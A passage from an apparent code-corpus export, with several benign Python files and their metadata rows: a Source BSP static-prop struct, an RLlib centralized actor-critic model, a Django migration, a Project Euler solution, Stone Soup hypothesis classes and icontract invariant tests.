class StaticPropv10(base.Struct): # sprp GAME LUMP (LUMP 35)
origin: List[float] # origin.xyz
angles: List[float] # origin.yzx QAngle; Z0 = East
    name_index: int  # index into GAME_LUMP.sprp.model_names
first_leaf: int # index into Leaf lump
num_leafs: int # number of Leafs after first_leaf this StaticPropv10 is in
solid_mode: int # collision flags enum
skin: int # index of this StaticProp's skin in the .mdl
    fade_distance: List[float]  # min & max distances to fade out
    lighting_origin: List[float]  # xyz position to sample lighting from
    forced_fade_scale: float  # relative to pixels used to render on-screen?
    dx_level: List[int]  # supported directX level, will not render depending on settings
    flags: int  # other flags
    lightmap: List[int]  # dimensions of this StaticProp's lightmap (GAME_LUMP.static prop lighting?)
    __slots__ = ["origin", "angles", "name_index", "first_leaf", "num_leafs",
"solid_mode", "skin", "fade_distance", "lighting_origin",
"forced_fade_scale", "dx_level", "flags", "lightmap"]
_format = "6f3HBi6f2Hi2H"
_arrays = {"origin": [*"xyz"], "angles": [*"yzx"], "fade_distance": ["min", "max"],
"lighting_origin": [*"xyz"], "dx_level": ["min", "max"],
"lightmap": ["width", "height"]}
# {"LUMP_NAME": {version: LumpClass}}
BASIC_LUMP_CLASSES = source.BASIC_LUMP_CLASSES.copy()
LUMP_CLASSES = source.LUMP_CLASSES.copy()
LUMP_CLASSES.update({"LEAVES": {1: Leaf}})
SPECIAL_LUMP_CLASSES = source.SPECIAL_LUMP_CLASSES.copy()
GAME_LUMP_HEADER = source.GAME_LUMP_HEADER
# {"lump": {version: SpecialLumpClass}}
GAME_LUMP_CLASSES = source.GAME_LUMP_CLASSES.copy()
GAME_LUMP_CLASSES["sprp"].update({7: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10), # 7*
10: lambda raw_lump: source.GameLump_SPRP(raw_lump, StaticPropv10)})
methods = [*source.methods]
| true | true |
1c4a711bd8237da25790895bd0df02e797b5f2e6 | 5,306 | py | Python | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | null | null | null | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | null | null | null | benchmark/networks/centralized_ac.py | HONGcalmJIN/SMARTS | 0e2249a3bc985ee9279512d6154ce32732065835 | [
"MIT"
] | 1 | 2022-03-31T02:14:09.000Z | 2022-03-31T02:14:09.000Z | import numpy as np
from collections import OrderedDict
from typing import List, Dict
from gym import spaces
from ray.rllib.utils.framework import try_import_tf, get_activation_fn
from ray.rllib.utils.annotations import override
from ray.rllib.utils.types import ModelConfigDict, TensorType
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.preprocessors import get_preprocessor
import tensorflow as tf
tf1, tf, tf_version = try_import_tf()
class CentralizedActorCriticModel(TFModelV2):
CRITIC_OBS = "critic_obs"
def __init__(
self,
obs_space: spaces.Space,
action_space: spaces.Space,
num_outputs: int,
model_config: ModelConfigDict,
name: str,
):
super(CentralizedActorCriticModel, self).__init__(
obs_space, action_space, num_outputs, model_config, name
)
model_config = model_config["custom_model_config"]
self.n_agents = model_config["agent_number"]
if model_config["critic_mode"] == "mean":
self.critic_obs = spaces.Dict(
OrderedDict(
{
"own_obs": self.obs_space,
"own_act": self.action_space,
"oppo_act": self.action_space,
}
)
)
else:
self.critic_obs = spaces.Dict(
OrderedDict(
{
**{f"AGENT-{i}": self.obs_space for i in range(self.n_agents)},
**{
f"AGENT-{i}-action": self.action_space
for i in range(self.n_agents)
},
}
)
)
self.critic_preprocessor = get_preprocessor(self.critic_obs)(self.critic_obs)
self.obs_preprocessor = get_preprocessor(self.obs_space)(self.obs_space)
self.act_preprocessor = get_preprocessor(self.action_space)(self.action_space)
self.action_model = self._build_action_model(model_config["action_model"])
self.value_model = self._build_value_model(model_config["value_model"])
self.register_variables(self.action_model.variables)
self.register_variables(self.value_model.variables)
def _build_action_model(self, model_config: ModelConfigDict):
"""Build action model with model configuration
model_config = {'activation': str, 'hiddens': Sequence}
"""
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.obs_preprocessor.shape),), name="policy-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
logits_out = tf.keras.layers.Dense(
self.num_outputs,
name="logits_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [logits_out])
def _build_value_model(self, model_config: ModelConfigDict):
"""Build value model with given model configuration
model_config = {'activation': str, 'hiddens': Sequence}
"""
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.critic_preprocessor.shape),), name="value-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
value_out = tf.keras.layers.Dense(
1,
name="value_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [value_out])
@override(ModelV2)
def forward(
self,
input_dict: Dict[str, TensorType],
state: List[TensorType],
seq_lens: TensorType,
) -> (TensorType, List[TensorType]):
# obs = self.obs_preprocessor.transform(input_dict["obs"])
logits_out = self.action_model(input_dict["obs_flat"])
return logits_out, state
def central_value_function(self, critic_obs):
# Dict({obs, action})
# critic_obs = self.critic_preprocessor.transform(critic_obs)
self._value_out = self.value_model(critic_obs)
return tf.reshape(self._value_out, [-1])
@override(ModelV2)
def value_function(self) -> TensorType:
return tf.reshape(self._value_out, [-1])
ModelCatalog.register_custom_model("CAC", CentralizedActorCriticModel)
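# Illustrative sketch (not from the original file): a trainer config would
# select this model roughly as follows; the hidden sizes and activations here
# are arbitrary, only the key names are taken from the code above:
# config["model"] = {
#     "custom_model": "CAC",
#     "custom_model_config": {
#         "agent_number": 2,
#         "critic_mode": "mean",
#         "action_model": {"activation": "tanh", "hiddens": [64, 64]},
#         "value_model": {"activation": "tanh", "hiddens": [64, 64]},
#     },
# }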
| 35.851351 | 87 | 0.613456 | import numpy as np
from collections import OrderedDict
from typing import List, Dict
from gym import spaces
from ray.rllib.utils.framework import try_import_tf, get_activation_fn
from ray.rllib.utils.annotations import override
from ray.rllib.utils.types import ModelConfigDict, TensorType
from ray.rllib.models import ModelCatalog
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.preprocessors import get_preprocessor
import tensorflow as tf
tf1, tf, tf_version = try_import_tf()
class CentralizedActorCriticModel(TFModelV2):
CRITIC_OBS = "critic_obs"
def __init__(
self,
obs_space: spaces.Space,
action_space: spaces.Space,
num_outputs: int,
model_config: ModelConfigDict,
name: str,
):
super(CentralizedActorCriticModel, self).__init__(
obs_space, action_space, num_outputs, model_config, name
)
model_config = model_config["custom_model_config"]
self.n_agents = model_config["agent_number"]
if model_config["critic_mode"] == "mean":
self.critic_obs = spaces.Dict(
OrderedDict(
{
"own_obs": self.obs_space,
"own_act": self.action_space,
"oppo_act": self.action_space,
}
)
)
else:
self.critic_obs = spaces.Dict(
OrderedDict(
{
**{f"AGENT-{i}": self.obs_space for i in range(self.n_agents)},
**{
f"AGENT-{i}-action": self.action_space
for i in range(self.n_agents)
},
}
)
)
self.critic_preprocessor = get_preprocessor(self.critic_obs)(self.critic_obs)
self.obs_preprocessor = get_preprocessor(self.obs_space)(self.obs_space)
self.act_preprocessor = get_preprocessor(self.action_space)(self.action_space)
self.action_model = self._build_action_model(model_config["action_model"])
self.value_model = self._build_value_model(model_config["value_model"])
self.register_variables(self.action_model.variables)
self.register_variables(self.value_model.variables)
def _build_action_model(self, model_config: ModelConfigDict):
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.obs_preprocessor.shape),), name="policy-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
logits_out = tf.keras.layers.Dense(
self.num_outputs,
name="logits_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [logits_out])
def _build_value_model(self, model_config: ModelConfigDict):
activation = get_activation_fn(model_config.get("activation"))
hiddens = model_config.get("hiddens", [])
inputs = tf.keras.layers.Input(
shape=(np.product(self.critic_preprocessor.shape),), name="value-inputs"
)
last_layer = inputs
for i, size in enumerate(hiddens):
last_layer = tf.keras.layers.Dense(
size,
name="fc_{}".format(i),
activation=activation,
kernel_initializer=normc_initializer(1.0),
)(last_layer)
value_out = tf.keras.layers.Dense(
1,
name="value_out",
activation=None,
kernel_initializer=normc_initializer(0.01),
)(last_layer)
return tf.keras.Model(inputs, [value_out])
@override(ModelV2)
def forward(
self,
input_dict: Dict[str, TensorType],
state: List[TensorType],
seq_lens: TensorType,
) -> (TensorType, List[TensorType]):
logits_out = self.action_model(input_dict["obs_flat"])
return logits_out, state
def central_value_function(self, critic_obs):
self._value_out = self.value_model(critic_obs)
return tf.reshape(self._value_out, [-1])
@override(ModelV2)
def value_function(self) -> TensorType:
return tf.reshape(self._value_out, [-1])
ModelCatalog.register_custom_model("CAC", CentralizedActorCriticModel)
| true | true |
1c4a7170b0fa8e60f08719c553b8346bac8ea857 | 525 | py | Python | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 18 | 2017-08-12T06:57:27.000Z | 2022-03-17T18:55:04.000Z | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 18 | 2017-03-25T04:39:23.000Z | 2021-07-07T13:18:38.000Z | src/asymmetric_jwt_auth/migrations/0002_publickey_comment.py | crgwbr/asymmetric-jwt-auth | e4b7889a893dcc57eab20a2ed7265b6e9f44d4b9 | [
"0BSD"
] | 8 | 2017-03-02T14:00:02.000Z | 2020-03-21T08:29:17.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("asymmetric_jwt_auth", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="publickey",
name="comment",
field=models.CharField(
max_length=100, help_text="Comment describing this key", default=""
),
preserve_default=False,
),
]
| 22.826087 | 83 | 0.586667 | from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("asymmetric_jwt_auth", "0001_initial"),
]
operations = [
migrations.AddField(
model_name="publickey",
name="comment",
field=models.CharField(
max_length=100, help_text="Comment describing this key", default=""
),
preserve_default=False,
),
]
| true | true |
1c4a7192efc324ef4cc55befd164bd83b94f86a8 | 342 | py | Python | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | python/p026.py | Martin-Gong/euler | dc29cb99c0e5f9916428de624edc375d9d5b4543 | [
"MIT"
] | null | null | null | # 26
def getRecurLen(n):
seq = {}
rem = 1 % n
i = 1
while(rem not in seq):
seq[rem] = i
rem = (10 * rem) % n
if rem == 0:
return 0
i += 1
return len(seq) - seq[rem] + 1
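# Illustrative examples (not in the original solution): 1/7 = 0.(142857)
# repeats with cycle length 6, while 1/4 = 0.25 terminates, giving 0:
# >>> getRecurLen(7)
# 6
# >>> getRecurLen(4)
# 0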
# track the longest cycle length and the denominator that produced it
best_len = 0
ans = 0
for d in range(1, 1000):
    n = getRecurLen(d)
    if n > best_len:
        best_len = n
        ans = d
print(ans)
| 13.68 | 34 | 0.421053 |
def getRecurLen(n):
seq = {}
rem = 1 % n
i = 1
while(rem not in seq):
seq[rem] = i
rem = (10 * rem) % n
if rem == 0:
return 0
i += 1
return len(seq) - seq[rem] + 1
best_len = 0
ans = 0
for d in range(1, 1000):
    n = getRecurLen(d)
    if n > best_len:
        best_len = n
        ans = d
print(ans)
| true | true |
1c4a71fe54c3b911852677cd9a5459e70d22fa8e | 7,860 | py | Python | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | 1 | 2021-12-02T00:17:21.000Z | 2021-12-02T00:17:21.000Z | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | null | null | null | stonesoup/types/multihypothesis.py | 0sm1um/Stone-Soup | aaa895b54383e9a9b9c9f9ff746291bf60242aab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
class MultipleHypothesis(Type, Sized, Iterable, Container):
"""Multiple Hypothesis base type
A Multiple Hypothesis is a container to store a collection of hypotheses.
"""
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
# check if 'single_hypotheses' contains any SingleHypotheses with
# Detection matching 'index'
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses with
# Prediction matching 'index'
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
# check if 'single_hypotheses' contains any SingleHypotheses
# matching 'index'
if isinstance(index, SingleHypothesis):
return index in self.single_hypotheses
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
# retrieve SingleHypothesis by array index
if isinstance(index, int):
return self.single_hypotheses[index]
# retrieve SingleHypothesis by measurement
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
# retrieve SingleHypothesis by prediction
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
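# Illustrative sketch (not from the original module): with `hyps` being a
# hypothetical list of SingleHypothesis objects that each carry a
# `probability`, normalisation rescales the weights so that they sum to
# `total_weight` (1 by default):
# >>> mh = MultipleHypothesis(single_hypotheses=hyps, normalise=True)
# >>> float(Probability.sum(h.probability for h in mh))  # ~1.0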
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
"""Multiple composite hypothesis type
A Multiple Composite Hypothesis is a container to store a collection of composite hypotheses.
    It exposes the same interface as MultipleHypothesis, but accepts different inputs,
    hence its methods are redefined.
"""
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
# normalise the weights of 'single_hypotheses', if indicated
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
# cannot check instance index is detection or prediction as composite hypotheses create
# their own composite detections and predictions
# check if 'single_hypotheses' contains any CompositeHypotheses matching 'index'
# use `is` as standard list __contains__ checks for equality which may not work in cases
# where hypotheses do not all share same attributes
if isinstance(index, CompositeHypothesis):
return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
# verify that SingleHypotheses composing this MultipleHypothesis
# all have Probabilities
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
# this will NOT affect the probabilities of each composite hypothesis' sub-hypotheses
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
| 38.719212 | 99 | 0.663232 | from collections.abc import Sized, Iterable, Container
from typing import Sequence
from .detection import MissedDetection
from .numeric import Probability
from ..base import Property
from ..types import Type
from ..types.detection import Detection
from ..types.hypothesis import SingleHypothesis, CompositeHypothesis
from ..types.prediction import Prediction
class MultipleHypothesis(Type, Sized, Iterable, Container):
single_hypotheses: Sequence[SingleHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.SingleHypothesis`. Default `None` "
"which initialises with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.SingleHypothesis`. Default "
"is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if any(not isinstance(hypothesis, SingleHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-SingleHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
if self.normalise:
self.normalise_probabilities()
def __len__(self):
return self.single_hypotheses.__len__()
def __contains__(self, index):
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return True
return False
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return True
return False
if isinstance(index, SingleHypothesis):
return index in self.single_hypotheses
def __iter__(self):
for hypothesis in self.single_hypotheses:
yield hypothesis
def __getitem__(self, index):
if isinstance(index, int):
return self.single_hypotheses[index]
if isinstance(index, Detection):
for hypothesis in self.single_hypotheses:
if hypothesis.measurement is index:
return hypothesis
return None
if isinstance(index, Prediction):
for hypothesis in self.single_hypotheses:
if hypothesis.prediction is index:
return hypothesis
return None
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError("MultipleHypothesis not composed of Probability"
" hypotheses!")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability =\
(hypothesis.probability * total_weight)/sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if isinstance(hypothesis.measurement, MissedDetection):
if hasattr(hypothesis, 'probability'):
return hypothesis.probability
return None
class MultipleCompositeHypothesis(Type, Sized, Iterable, Container):
single_hypotheses: Sequence[CompositeHypothesis] = Property(
default=None,
doc="The initial list of :class:`~.CompositeHypothesis`. Default `None` which initialises "
"with empty list.")
normalise: bool = Property(
default=False,
doc="Normalise probabilities of :class:`~.CompositeHypothesis`. Default is `False`.")
total_weight: float = Property(
default=1,
doc="When normalising, weights will sum to this. Default is 1.")
def __init__(self, single_hypotheses=None, normalise=False, *args,
**kwargs):
if single_hypotheses is None:
single_hypotheses = []
if not all(isinstance(hypothesis, CompositeHypothesis)
for hypothesis in single_hypotheses):
raise ValueError("Cannot form MultipleHypothesis out of "
"non-CompositeHypothesis inputs!")
super().__init__(single_hypotheses, normalise, *args, **kwargs)
if self.normalise:
self.normalise_probabilities()
def __contains__(self, index):
if isinstance(index, CompositeHypothesis):
return any(index is single_hypothesis for single_hypothesis in self.single_hypotheses)
def __getitem__(self, index):
return self.single_hypotheses.__getitem__(index)
def __iter__(self):
return self.single_hypotheses.__iter__()
def __len__(self):
return self.single_hypotheses.__len__()
def normalise_probabilities(self, total_weight=None):
if total_weight is None:
total_weight = self.total_weight
if any(not hasattr(hypothesis, 'probability')
for hypothesis in self.single_hypotheses):
raise ValueError(
"MultipleHypothesis not composed of composite hypotheses with probabilities")
sum_weights = Probability.sum(
hypothesis.probability for hypothesis in self.single_hypotheses)
for hypothesis in self.single_hypotheses:
hypothesis.probability = \
(hypothesis.probability * total_weight) / sum_weights
def get_missed_detection_probability(self):
for hypothesis in self.single_hypotheses:
if hasattr(hypothesis, 'probability') and not hypothesis:
return hypothesis.probability
return None
| true | true |
1c4a72bba58f35607b720e9dfaa0b6d738ef6fd0 | 26,738 | py | Python | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 244 | 2018-08-15T22:58:58.000Z | 2022-03-12T16:10:39.000Z | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 157 | 2018-08-29T21:36:47.000Z | 2022-02-14T19:30:24.000Z | tests/test_invariant.py | kklein/icontract | 718ef1733cc2cce6d3c8f59a5a37de96f8be6664 | [
"MIT"
] | 23 | 2019-04-24T11:09:10.000Z | 2022-02-14T15:56:26.000Z | # pylint: disable=missing-docstring
# pylint: disable=invalid-name
# pylint: disable=unused-argument
import textwrap
import time
import unittest
from typing import Dict, Iterator, Mapping, Optional, Any, NamedTuple # pylint: disable=unused-import
import icontract
import tests.error
import tests.mock
class TestOK(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_instance_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
inst.some_method()
self.assertEqual(1000, inst.x)
def test_unbound_instance_method_with_self_as_kwarg(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 1000
inst = SomeClass()
func = inst.some_method.__func__ # type: ignore
func(self=inst)
def test_magic_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def __call__(self) -> None:
self.x = 1000
inst = SomeClass()
inst()
self.assertEqual(1000, inst.x)
def test_class_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
@classmethod
def some_class_method(cls) -> None:
pass
inst = SomeClass()
self.assertEqual(100, inst.x)
def test_static_method(self) -> None:
# Adapted from https://github.com/Parquery/icontract/issues/186
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
# We need this instance method for easier debugging.
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
_ = A()
def test_inherited_static_method(self) -> None:
@icontract.invariant(lambda self: A.some_static_method(self.x))
@icontract.invariant(lambda self: self.some_instance_method())
class A:
def __init__(self) -> None:
self.x = 10
def some_instance_method(self) -> bool:
# We need this instance method for easier debugging.
return self.x < 100
@staticmethod
def some_static_method(x: int) -> bool:
return x > 0
# We need to test for inheritance.
# See https://stackoverflow.com/questions/14187973/#comment74562120_37147128
class B(A):
pass
_ = B()
def test_protected_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A protected method is allowed to break the invariant.
def _some_protected_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_protected_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A protected method can not expect the invariant to hold.
def _some_protected_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self._some_protected_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_private_method_may_violate_inv(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A private method is allowed to break the invariant.
def __some_private_method(self) -> None:
self.x = -1
def some_method(self) -> None:
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_broken_before_private_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
# A private method can not expect the invariant to hold.
def __some_private_method(self) -> None:
pass
def some_method(self) -> None:
self.x = -1
self.__some_private_method()
self.x = 10
inst = SomeClass()
inst.some_method()
self.assertEqual(10, inst.x)
def test_inv_with_empty_arguments(self) -> None: # pylint: disable=no-self-use
z = 42
@icontract.invariant(lambda: z == 42)
class A:
pass
_ = A()
def test_no_dict_pollution(self) -> None:
testSelf = self
@icontract.invariant(lambda self: self.mustHold())
class A:
def mustHold(self) -> bool:
testSelf.assertDictEqual({}, self.__dict__)
return True
_ = A()
def test_new_exempted(self) -> None:
# This test is related to the issue #167.
new_call_counter = 0
init_call_counter = 0
@icontract.invariant(lambda self: True)
class Foo:
def __new__(cls, *args, **kwargs) -> 'Foo': # type: ignore
nonlocal new_call_counter
new_call_counter += 1
return super(Foo, cls).__new__(cls) # type: ignore
def __init__(self) -> None:
nonlocal init_call_counter
init_call_counter += 1
_ = Foo()
self.assertEqual(1, new_call_counter)
self.assertEqual(1, init_call_counter)
def test_subclass_of_generic_mapping(self) -> None:
# This test is related to the issue #167.
counter = 0
def increase_counter(self: Any) -> bool:
nonlocal counter
counter += 1
return True
@icontract.invariant(increase_counter)
class Foo(Mapping[str, int]):
def __init__(self, table: Dict[str, int]) -> None:
self._table = table
def __getitem__(self, key: str) -> int:
return self._table[key]
def __iter__(self) -> Iterator[str]:
return iter(self._table)
def __len__(self) -> int:
return len(self._table)
def __str__(self) -> str:
return '{}({})'.format(self.__class__.__name__, self._table)
f = Foo({'a': 1}) # test the constructor
_ = f['a'] # test __getitem__
_ = iter(f) # test __iter__
_ = len(f) # test __len__
_ = str(f) # test __str__
# 1 invariant check after the constructor +
# 4 checks before the methods +
# 4 checks after the methods.
self.assertEqual(9, counter)
class TestViolation(unittest.TestCase):
def test_init(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self, x: int) -> None:
self.x = x
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
_ = SomeClass(x=1)
violation_error = None # type: Optional[icontract.ViolationError]
try:
_ = SomeClass(x=0)
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was 0"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_inv_as_precondition(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = 10
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
try:
inst = SomeClass()
inst.x = -1
inst.some_method()
except icontract.ViolationError as err:
violation_error = err
self.assertIsNotNone(violation_error)
self.assertEqual(
textwrap.dedent("""\
self.x > 0:
self was an instance of SomeClass
self.x was -1"""), tests.error.wo_mandatory_location(str(violation_error)))
def test_method(self) -> None:
@icontract.invariant(lambda self: self.x > 0)
class SomeClass:
def __init__(self) -> None:
self.x = 100
def some_method(self) -> None:
self.x = -1
def __repr__(self) -> str:
return "an instance of {}".format(self.__class__.__name__)
violation_error = None # type: Optional[icontract.ViolationError]
